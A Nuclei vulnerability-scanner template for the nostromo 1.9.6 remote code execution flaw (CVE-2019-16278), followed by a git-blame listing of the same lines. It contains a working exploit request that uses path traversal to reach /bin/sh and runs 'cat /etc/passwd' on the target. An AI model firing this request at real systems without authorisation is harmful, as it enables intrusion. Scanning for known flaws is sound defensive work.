nuclei-templates/cves/2019/CVE-2019-16278.yaml

id: CVE-2019-16278

info:
  author: pikpikcu
  name: nostromo 1.9.6 - Remote Code Execution
  severity: critical
  reference: https://www.exploit-db.com/raw/47837
  tags: cve,cve2019,rce

requests:
  - raw:
      - |
        POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
        Content-Length: 1
        Connection: close

        echo
        echo
        cat /etc/passwd 2>&1

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-16278`
Create CVE-2019-16278.yaml 2020-09-01 15:59:30 +00:00
			`info:`
Update CVE-2019-16278.yaml 2020-09-01 17:58:20 +00:00			`author: pikpikcu`
			`name: nostromo 1.9.6 - Remote Code Execution`
			`severity: critical`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`reference: https://www.exploit-db.com/raw/47837`
			`tags: cve,cve2019,rce`
Create CVE-2019-16278.yaml 2020-09-01 15:59:30 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0`
			`Content-Length: 1`
			`Connection: close`
Update CVE-2019-16278.yaml 2020-09-01 17:59:32 +00:00
Create CVE-2019-16278.yaml 2020-09-01 15:59:30 +00:00			`echo`
			`echo`
			`cat /etc/passwd 2>&1`
Update CVE-2019-16278.yaml 2020-09-01 17:59:32 +00:00
Create CVE-2019-16278.yaml 2020-09-01 15:59:30 +00:00			`matchers:`
			`- type: regex`
			`regex:`
Update CVE-2019-16278.yaml 2020-09-01 17:58:20 +00:00			`- "root:[x*]:0:0:"`